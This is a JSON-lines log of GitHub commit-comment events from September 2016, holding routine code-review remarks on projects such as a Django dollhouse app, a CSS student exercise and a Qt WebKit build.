{"id":"4614701333","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164693,"position":35,"line":39,"path":"house/views.py","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:35:19Z","updated_at":"2016-09-25T18:35:19Z","body":"You don't need the first set of parens -- this is the same as `request.POST`."}},"created_at":"2016-09-25T18:35:19Z"}
{"id":"4614701843","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"LegendOfMCPE/xEcon"},"payload":{"comment":{"id":19164695,"position":null,"line":null,"path":null,"commit_id":"5cbd9a355a6aa13ea2c36008420669771ab40214","created_at":"2016-09-25T18:35:41Z","updated_at":"2016-09-25T18:35:41Z","body":"This is when you say, \"oh, that's when I learnt logarithm!\""}},"created_at":"2016-09-25T18:35:41Z"}
{"id":"4614701864","type":"CommitCommentEvent","actor":{"login":"Becold"},"repo":{"name":"leek-wars/leek-wars-client"},"payload":{"comment":{"id":19164696,"position":2,"line":2,"path":".gitignore","commit_id":"51ad3b1683baf8c84a4c7d06fa356bad08622c14","created_at":"2016-09-25T18:35:41Z","updated_at":"2016-09-25T18:35:41Z","body":"Do you mean .htaccess ?"}},"created_at":"2016-09-25T18:35:41Z"}
{"id":"4614702120","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164697,"position":36,"line":40,"path":"house/views.py","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:35:51Z","updated_at":"2016-09-25T18:35:51Z","body":"You might be able to use `items` on `request.POST` directly without calling `dict()`."}},"created_at":"2016-09-25T18:35:51Z"}
{"id":"4614702495","type":"CommitCommentEvent","actor":{"login":"TheVisitorX"},"repo":{"name":"appcelerator/titanium_mobile"},"payload":{"comment":{"id":19164700,"position":null,"line":null,"path":null,"commit_id":"1bbb2194bbbaac9a5a8d2582fb5248eca20c88ee","created_at":"2016-09-25T18:36:09Z","updated_at":"2016-09-25T18:36:09Z","body":"It doesn't flicker any more but the scrolling isn't as smooth as before. So not a good \"patch\" in my opinion... "}},"created_at":"2016-09-25T18:36:09Z"}
{"id":"4614703176","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164704,"position":39,"line":43,"path":"house/views.py","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:36:40Z","updated_at":"2016-09-25T18:36:40Z","body":"As an exercise, you might think about how you could extract the shared part of the `doll()` and `accessory()` functions. They have an awful lot in common."}},"created_at":"2016-09-25T18:36:40Z"}
{"id":"4614704398","type":"CommitCommentEvent","actor":{"login":"xylographe"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19164710,"position":17,"line":17,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T18:37:28Z","updated_at":"2016-09-25T18:37:28Z","body":"Perhaps, allow **optional** white space while parsing?\r\n```cs\r\nprivate static readonly Regex RegexTimeCodes = new Regex(@\"^(\\d+)\\s*,\\s*(\\d+)\\s*,\", RegexOptions.Compiled);\r\n```\r\nWould accept, for example, \r\n```\r\n2447,2513,\"You should come to the Drama Club, too.\"\r\n2513  ,2594  ,\"Yeah. The Drama Club is worried|that you haven't been coming.\"\r\n  2603  ,  2675  ,  \"I see. Sorry, I'll drop by next time.\"\r\n```\r\n"}},"created_at":"2016-09-25T18:37:28Z"}
{"id":"4614704638","type":"CommitCommentEvent","actor":{"login":"xylographe"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19164711,"position":34,"line":34,"path":"libse/SubtitleFormats/PhoenixSubtitle.cs","commit_id":"c1188fefc0387b829d6419028e333f6d7be15d63","created_at":"2016-09-25T18:37:38Z","updated_at":"2016-09-25T18:37:38Z","body":"`return false;` ?"}},"created_at":"2016-09-25T18:37:38Z"}
{"id":"4614705047","type":"CommitCommentEvent","actor":{"login":"jekhor"},"repo":{"name":"minsk-hackerspace/hsWEB"},"payload":{"comment":{"id":19164716,"position":71,"line":58,"path":"app/views/main/rules.html.haml","commit_id":"350d24b2f8c09eedf53764569f5a1d58f3e81d59","created_at":"2016-09-25T18:37:56Z","updated_at":"2016-09-25T18:37:56Z","body":"Э-э, зелёный надо бы переформулировать."}},"created_at":"2016-09-25T18:37:56Z"}
{"id":"4614706200","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164717,"position":161,"line":222,"path":"house/static/house/dressing_room.js","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:38:46Z","updated_at":"2016-09-25T18:38:46Z","body":"Is this correct? I don't think that's the ID of the accessory, but just its location in the list (which might be different for the second user)."}},"created_at":"2016-09-25T18:38:46Z"}
{"id":"4614707820","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164719,"position":172,"line":233,"path":"house/static/house/dressing_room.js","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:39:56Z","updated_at":"2016-09-25T18:39:56Z","body":"You should do this as the `success` part of the `ajax` call, both 1. so you can wait for it to finish and not reload it before then, and 2. so you can handle it if the view fails somehow (maybe display a message to the user?)."}},"created_at":"2016-09-25T18:39:56Z"}
{"id":"4614709452","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164723,"position":139,"line":190,"path":"house/static/house/dressing_room.js","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:41:02Z","updated_at":"2016-09-25T18:41:02Z","body":"This should also be in the `done` part."}},"created_at":"2016-09-25T18:41:02Z"}
{"id":"4614712014","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164729,"position":15,"line":15,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:42:48Z","updated_at":"2016-09-25T18:42:48Z","body":"Do not add vendor prefixes manually. You should use Autoprefixer."}},"created_at":"2016-09-25T18:42:48Z"}
{"id":"4614713639","type":"CommitCommentEvent","actor":{"login":"stgraber"},"repo":{"name":"brauner/lxd"},"payload":{"comment":{"id":19164732,"position":null,"line":null,"path":null,"commit_id":"726bbdaf130f7ba152da2f5ee36c1b9c3d5c777d","created_at":"2016-09-25T18:43:56Z","updated_at":"2016-09-25T18:43:56Z","body":"Nevermind, I must have misread, looks fine."}},"created_at":"2016-09-25T18:43:56Z"}
{"id":"4614713708","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164733,"position":29,"line":29,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:43:58Z","updated_at":"2016-09-25T18:43:58Z","body":"Which font face is global (or just frequently used)?"}},"created_at":"2016-09-25T18:43:58Z"}
{"id":"4614714345","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164735,"position":30,"line":30,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:44:23Z","updated_at":"2016-09-25T18:44:23Z","body":"This is not `white`. This is `#ffffff`!"}},"created_at":"2016-09-25T18:44:23Z"}
{"id":"4614714594","type":"CommitCommentEvent","actor":{"login":"tyrrang"},"repo":{"name":"tyrrang/la-hermana-de-toti"},"payload":{"comment":{"id":19164738,"position":null,"line":null,"path":null,"commit_id":"9967ebf5f86d9bb44a76cd495b69d18ef5fdf95c","created_at":"2016-09-25T18:44:32Z","updated_at":"2016-09-25T18:44:32Z","body":"hola"}},"created_at":"2016-09-25T18:44:32Z"}
{"id":"4614715908","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164741,"position":79,"line":79,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:45:28Z","updated_at":"2016-09-25T18:45:28Z","body":"Are you sure you want to make margin dependent on font size?"}},"created_at":"2016-09-25T18:45:28Z"}
{"id":"4614716656","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19164744,"position":null,"line":null,"path":null,"commit_id":"c3e3470cbd8df5d450332084d74a2452f2cd5fca","created_at":"2016-09-25T18:45:55Z","updated_at":"2016-09-25T18:45:55Z","body":"Hokg Kong is intentional, the startup message shows 'Hokg Kong' so it was documented as such even if it's a typo.\r\n\r\n"}},"created_at":"2016-09-25T18:45:55Z"}
{"id":"4614717000","type":"CommitCommentEvent","actor":{"login":"pounard"},"repo":{"name":"makinacorpus/drupal-ucms"},"payload":{"comment":{"id":19164745,"position":36,"line":197,"path":"ucms_site/src/NodeManager.php","commit_id":"7ee33e68827d79c29016d5dee9468b15032361ed","created_at":"2016-09-25T18:46:07Z","updated_at":"2016-09-25T18:46:07Z","body":"Setting the node \"name\" parameter is unnecessary, you don't need to load the user. Just use the $updates['uid'] value directly."}},"created_at":"2016-09-25T18:46:07Z"}
{"id":"4614717881","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164746,"position":92,"line":92,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:46:43Z","updated_at":"2016-09-25T18:46:43Z","body":"Perhaps it should be just one generic class, like `.img`? :)"}},"created_at":"2016-09-25T18:46:43Z"}
{"id":"4614718370","type":"CommitCommentEvent","actor":{"login":"attuska"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19164747,"position":null,"line":null,"path":null,"commit_id":"8a3ff5bb02f4fdb2a86121d111874ba4b49cbe86","created_at":"2016-09-25T18:47:01Z","updated_at":"2016-09-25T18:47:01Z","body":"Megelőztél!\r\n\r\nMost csinálta meg én is, most azért nem tudtam az lxqt-meta csomagot csinálmi, mert várok a Packages fájlra.\r\n"}},"created_at":"2016-09-25T18:47:01Z"}
{"id":"4614718396","type":"CommitCommentEvent","actor":{"login":"pounard"},"repo":{"name":"makinacorpus/drupal-ucms"},"payload":{"comment":{"id":19164748,"position":6,"line":545,"path":"ucms_contrib/ucms_contrib.module","commit_id":"7ee33e68827d79c29016d5dee9468b15032361ed","created_at":"2016-09-25T18:47:01Z","updated_at":"2016-09-25T18:47:01Z","body":"This is supposed to be set in node events, why is this necessary to duplicate it in there?"}},"created_at":"2016-09-25T18:47:01Z"}
{"id":"4614722088","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164757,"position":110,"line":110,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:49:32Z","updated_at":"2016-09-25T18:49:32Z","body":"When you turn `outline` off, you should style the `:focus` state. More info [here](http://www.outlinenone.com/). BTW: I don’t even see styles for `:hover` state."}},"created_at":"2016-09-25T18:49:32Z"}
{"id":"4614722919","type":"CommitCommentEvent","actor":{"login":"rezso"},"repo":{"name":"uhulinux/ub-ubk1"},"payload":{"comment":{"id":19164762,"position":null,"line":null,"path":null,"commit_id":"8a3ff5bb02f4fdb2a86121d111874ba4b49cbe86","created_at":"2016-09-25T18:50:06Z","updated_at":"2016-09-25T18:50:06Z","body":"A kde framework függőségei miatt mindenképp megcsináltam volna.\r\nEléggé borította ezt a verziót az lxqt-l10n csomag, persze mindegyik csomagnál le kell tiltani a pull-t. "}},"created_at":"2016-09-25T18:50:06Z"}
{"id":"4614725277","type":"CommitCommentEvent","actor":{"login":"dbmspace"},"repo":{"name":"JonatasZocateli/ProjetoAM2016"},"payload":{"comment":{"id":19164767,"position":null,"line":null,"path":null,"commit_id":"0e109afc28ee983f7e50d36c16da4480a374c934","created_at":"2016-09-25T18:51:48Z","updated_at":"2016-09-25T18:51:48Z","body":"xz"}},"created_at":"2016-09-25T18:51:48Z"}
{"id":"4614726230","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164770,"position":166,"line":166,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:52:24Z","updated_at":"2016-09-25T18:52:24Z","body":"It is better to use `list-style: none` instead, since it contains more resets."}},"created_at":"2016-09-25T18:52:24Z"}
{"id":"4614728305","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164778,"position":181,"line":181,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:53:50Z","updated_at":"2016-09-25T18:53:50Z","body":"Maybe all links on the page have set this property so you can write it globally (I mean: `a { text-decoration: none; }`)."}},"created_at":"2016-09-25T18:53:50Z"}
{"id":"4614728314","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164779,"position":133,"line":184,"path":"house/static/house/dressing_room.js","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:53:51Z","updated_at":"2016-09-25T18:53:51Z","body":"I kept getting CSRF errors. Any idea what that's about?"}},"created_at":"2016-09-25T18:53:51Z"}
{"id":"4614729838","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19164781,"position":null,"line":null,"path":null,"commit_id":"958ab074a177b453bbdb4c05fea74cc1f0567232","created_at":"2016-09-25T18:54:51Z","updated_at":"2016-09-25T18:54:51Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2318 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-958ab074a177b453bbdb4c05fea74cc1f0567232-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-25T18:54:51Z"}
{"id":"4614730041","type":"CommitCommentEvent","actor":{"login":"glasserc"},"repo":{"name":"sferrazzaf/dollhouse"},"payload":{"comment":{"id":19164782,"position":52,"line":70,"path":"house/templates/house/dressing_room.html","commit_id":"3fe55748dd3062b8312029e155524091fac7c7b3","created_at":"2016-09-25T18:54:58Z","updated_at":"2016-09-25T18:54:58Z","body":"Not that there's anything wrong with this, but why is the value the picture, whereas for dolls, the value is the ID?"}},"created_at":"2016-09-25T18:54:58Z"}
{"id":"4614730790","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164785,"position":280,"line":280,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T18:55:26Z","updated_at":"2016-09-25T18:55:26Z","body":"Why this class name looks like that?"}},"created_at":"2016-09-25T18:55:26Z"}
{"id":"4614734942","type":"CommitCommentEvent","actor":{"login":"mattiemonster"},"repo":{"name":"mattiemonster/Megablock"},"payload":{"comment":{"id":19164800,"position":7,"line":32,"path":"Project/core/src/mattiemonster/megablock/engine/MegablockMath.java","commit_id":"c135bda2e22ccbe8830cd01fadc65fe223bce77c","created_at":"2016-09-25T18:58:13Z","updated_at":"2016-09-25T18:58:13Z","body":"yay blank line"}},"created_at":"2016-09-25T18:58:13Z"}
{"id":"4614735848","type":"CommitCommentEvent","actor":{"login":"martindholmes"},"repo":{"name":"TEIC/Stylesheets"},"payload":{"comment":{"id":19164804,"position":null,"line":null,"path":null,"commit_id":"f3044b9e37520fd034b27dc792f948a8cb172538","created_at":"2016-09-25T18:58:53Z","updated_at":"2016-09-25T18:58:53Z","body":"Yes : file:// is relative, file:/// is absolute, I think."}},"created_at":"2016-09-25T18:58:53Z"}
{"id":"4614738127","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164815,"position":null,"line":null,"path":null,"commit_id":"a505274673b297eeedb48db37219dd7608f4527e","created_at":"2016-09-25T19:00:24Z","updated_at":"2016-09-25T19:00:24Z","body":"Used to be `'farminer': function(creep){ if (creep.room.name != 'W52N6' || creep.harvest(creep.room.find(FIND_SOURCES)[0]) != OK) creep.moveTo(Game.flags['FarMiner']); }` appended to the tasks dictionary, glad I cleaned it up"}},"created_at":"2016-09-25T19:00:24Z"}
{"id":"4614740507","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164820,"position":20,"line":27,"path":"main.js","commit_id":"a505274673b297eeedb48db37219dd7608f4527e","created_at":"2016-09-25T19:01:50Z","updated_at":"2016-09-25T19:01:50Z","body":"The harvestAdjoiningSource task is responsible for getting the creep back to the main room. If its task were set to 'haul' or 'build' and this wasn't the case, it would be looking for a ConstructionSite or the StructureController in the wrong room."}},"created_at":"2016-09-25T19:01:50Z"}
{"id":"4614743238","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19164826,"position":35,"line":42,"path":"main.js","commit_id":"a505274673b297eeedb48db37219dd7608f4527e","created_at":"2016-09-25T19:03:33Z","updated_at":"2016-09-25T19:03:33Z","body":"Only let one creep have the task 'harvestAdjoiningSource'. This is an experimental task, don't devote many resources to it. This does, however, waste ticks. The source in the adjoining room will not be harvested while a creep is traveling to or from it."}},"created_at":"2016-09-25T19:03:33Z"}
{"id":"4614743891","type":"CommitCommentEvent","actor":{"login":"tib"},"repo":{"name":"battlmonstr/awesome-xcode-extensions"},"payload":{"comment":{"id":19164828,"position":null,"line":null,"path":null,"commit_id":"0e9343905e027cc868a62b2e218d00af83c6e400","created_at":"2016-09-25T19:03:58Z","updated_at":"2016-09-25T19:03:58Z","body":"oh cool then :)"}},"created_at":"2016-09-25T19:03:58Z"}
{"id":"4614744622","type":"CommitCommentEvent","actor":{"login":"christopherthielen"},"repo":{"name":"jhipster/generator-jhipster"},"payload":{"comment":{"id":19164833,"position":12,"line":559,"path":"generators/client-2/index.js","commit_id":"768f8fa8b9aad043e7fd0b53f8df46c23e890909","created_at":"2016-09-25T19:04:27Z","updated_at":"2016-09-25T19:04:27Z","body":"Should this be `_footer.html`?"}},"created_at":"2016-09-25T19:04:27Z"}
{"id":"4614745109","type":"CommitCommentEvent","actor":{"login":"maloconcarne"},"repo":{"name":"RosadinTV/RosadinTV.github.io"},"payload":{"comment":{"id":19164834,"position":null,"line":null,"path":null,"commit_id":"805b30033ebe5b963f257882ab0e0b30a6eb73d3","created_at":"2016-09-25T19:04:48Z","updated_at":"2016-09-25T19:04:48Z","body":"Volvera? Cuando?"}},"created_at":"2016-09-25T19:04:48Z"}
{"id":"4614745666","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164835,"position":311,"line":311,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:05:10Z","updated_at":"2016-09-25T19:05:10Z","body":"What relation is between these two classes?"}},"created_at":"2016-09-25T19:05:10Z"}
{"id":"4614745964","type":"CommitCommentEvent","actor":{"login":"AlekseyDev"},"repo":{"name":"AlekseyDev/Angular2Learn"},"payload":{"comment":{"id":19164836,"position":null,"line":null,"path":null,"commit_id":"ddf026fa7f2414be405a0322a05c56721f71de9e","created_at":"2016-09-25T19:05:21Z","updated_at":"2016-09-25T19:05:21Z","body":"promise-vs-observable\r\n\r\nhttps://toster.ru/q/300049\r\nhttp://stackoverflow.com/questions/37364973/angular-2-promise-vs-observable\r\n\r\nObservable provides operators like map, forEach, reduce, ... similar to an array\r\n\r\nmap - для каждого результата\r\ntoPromise - преобразовать Observable в промис\r\nsubscribe - подписаться на изменения в observable"}},"created_at":"2016-09-25T19:05:21Z"}
{"id":"4614747952","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164840,"position":322,"line":322,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:06:36Z","updated_at":"2016-09-25T19:06:36Z","body":"You can round this value to `195px`. :)"}},"created_at":"2016-09-25T19:06:36Z"}
{"id":"4614748796","type":"CommitCommentEvent","actor":{"login":"connorshea"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19164844,"position":null,"line":null,"path":null,"commit_id":"a502703c3d2151d4d3b421b29fefdac5ad05df61","created_at":"2016-09-25T19:07:06Z","updated_at":"2016-09-25T19:07:06Z","body":"Added in #26619, thanks @arthurnn :)"}},"created_at":"2016-09-25T19:07:06Z"}
{"id":"4614749316","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19164846,"position":61,"line":287,"path":"Source/cmake/OptionsQt.cmake","commit_id":"90ded15eb0b0f23d7f3f28b9aac490620d6e66ff","created_at":"2016-09-25T19:07:27Z","updated_at":"2016-09-25T19:07:27Z","body":"This looks suspicious"}},"created_at":"2016-09-25T19:07:27Z"}
{"id":"4614749500","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19164847,"position":null,"line":null,"path":null,"commit_id":"8bf209ed6d292552228fb48984f0a8b84935a44d","created_at":"2016-09-25T19:07:34Z","updated_at":"2016-09-25T19:07:34Z","body":"Hi James, Good idea!  I just tried that but sadly it won't compile as the method signature is identical for each T{n}.  eg  `public bool Is<T>() where T: T0` is identical to `public bool Is<T>() where T: T1` as far as the compiler is concerned.  Am I missing something?"}},"created_at":"2016-09-25T19:07:34Z"}
{"id":"4614750469","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19164849,"position":17,"line":243,"path":"Source/cmake/OptionsQt.cmake","commit_id":"90ded15eb0b0f23d7f3f28b9aac490620d6e66ff","created_at":"2016-09-25T19:08:11Z","updated_at":"2016-09-25T19:08:11Z","body":"Doesn't prl handle this?"}},"created_at":"2016-09-25T19:08:11Z"}
{"id":"4614750577","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164850,"position":406,"line":406,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:08:16Z","updated_at":"2016-09-25T19:08:16Z","body":"Why `35vw`?"}},"created_at":"2016-09-25T19:08:16Z"}
{"id":"4614750894","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19164851,"position":32,"line":261,"path":"Source/cmake/OptionsQt.cmake","commit_id":"90ded15eb0b0f23d7f3f28b9aac490620d6e66ff","created_at":"2016-09-25T19:08:27Z","updated_at":"2016-09-25T19:08:27Z","body":"Doesn't prl handle this?"}},"created_at":"2016-09-25T19:08:27Z"}
{"id":"4614752065","type":"CommitCommentEvent","actor":{"login":"tonihele"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":19164853,"position":92,"line":92,"path":"src/toniarts/openkeeper/world/room/control/RoomAudioControl.java","commit_id":"e91fa3cfac885d16b532ccb8ce8ee68f94aa1f19","created_at":"2016-09-25T19:09:14Z","updated_at":"2016-09-25T19:09:14Z","body":"Yeah something like this. Before being production ready I would like us to have our own format. With our own format we could just have the asset keys there instead of indices etc. Best to wait until we are more familiar with the old format to get it right.  This is mainly to help fiddling with the sound playing mechanics."}},"created_at":"2016-09-25T19:09:14Z"}
{"id":"4614753622","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164864,"position":460,"line":460,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:10:15Z","updated_at":"2016-09-25T19:10:15Z","body":"Value of `721px` is not a common breakpoint. Why this one?"}},"created_at":"2016-09-25T19:10:15Z"}
{"id":"4614755553","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164869,"position":470,"line":470,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:11:28Z","updated_at":"2016-09-25T19:11:28Z","body":"Why this padding is dependent on viewport height?"}},"created_at":"2016-09-25T19:11:28Z"}
{"id":"4614756746","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164874,"position":472,"line":472,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:12:15Z","updated_at":"2016-09-25T19:12:15Z","body":"Do not style by ID."}},"created_at":"2016-09-25T19:12:15Z"}
{"id":"4614757334","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164875,"position":518,"line":518,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:12:38Z","updated_at":"2016-09-25T19:12:38Z","body":"Do not commit commented code."}},"created_at":"2016-09-25T19:12:38Z"}
{"id":"4614759671","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164881,"position":541,"line":541,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:14:00Z","updated_at":"2016-09-25T19:14:00Z","body":"Maybe `items-wrapper`? Moreover, you possibly can merge this rule with something else since this actually is only one property."}},"created_at":"2016-09-25T19:14:00Z"}
{"id":"4614759951","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":19164882,"position":20,"line":249,"path":"Source/WebKit/PlatformQt.cmake","commit_id":"90ded15eb0b0f23d7f3f28b9aac490620d6e66ff","created_at":"2016-09-25T19:14:10Z","updated_at":"2016-09-25T19:14:10Z","body":"Crap, Qt doesn't handle its own libraries properly!"}},"created_at":"2016-09-25T19:14:10Z"}
{"id":"4614761074","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164886,"position":608,"line":608,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:14:56Z","updated_at":"2016-09-25T19:14:56Z","body":"No newline at the end."}},"created_at":"2016-09-25T19:14:56Z"}
{"id":"4614762864","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164889,"position":30,"line":30,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:16:03Z","updated_at":"2016-09-25T19:16:03Z","body":"Uff. :D"}},"created_at":"2016-09-25T19:16:03Z"}
{"id":"4614764706","type":"CommitCommentEvent","actor":{"login":"jfmengels"},"repo":{"name":"sindresorhus/xo"},"payload":{"comment":{"id":19164894,"position":18,"line":18,"path":"config/overrides.js","commit_id":"04733f1724a74c494458754d4982de53cdc30eeb","created_at":"2016-09-25T19:17:11Z","updated_at":"2016-09-25T19:17:11Z","body":"Are you sure this one can be removed?"}},"created_at":"2016-09-25T19:17:11Z"}
{"id":"4614765033","type":"CommitCommentEvent","actor":{"login":"psturmfels"},"repo":{"name":"psturmfels/ios-team"},"payload":{"comment":{"id":19164895,"position":null,"line":null,"path":null,"commit_id":"09f15d3d9b8466ec5910564a918dce2cabb948d4","created_at":"2016-09-25T19:17:25Z","updated_at":"2016-09-25T19:17:25Z","body":"Hey Yufan, this looks great, thanks! I'm very happy with the colors.\r\n\r\nApologies for the delay on my part – I'm about to write up a style/committing guideline for this project. \r\nFor future commits, lets make sure that all our code conforms to that guideline. \r\n"}},"created_at":"2016-09-25T19:17:25Z"}
{"id":"4614765135","type":"CommitCommentEvent","actor":{"login":"didnotwant"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19164897,"position":36,"line":36,"path":"index.html","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-25T19:17:29Z","updated_at":"2016-09-25T19:17:29Z","body":"I don’t want to see placeholders like this (`...some title...`). :-1: Just put here the same content as in `href`. :)"}},"created_at":"2016-09-25T19:17:29Z"}
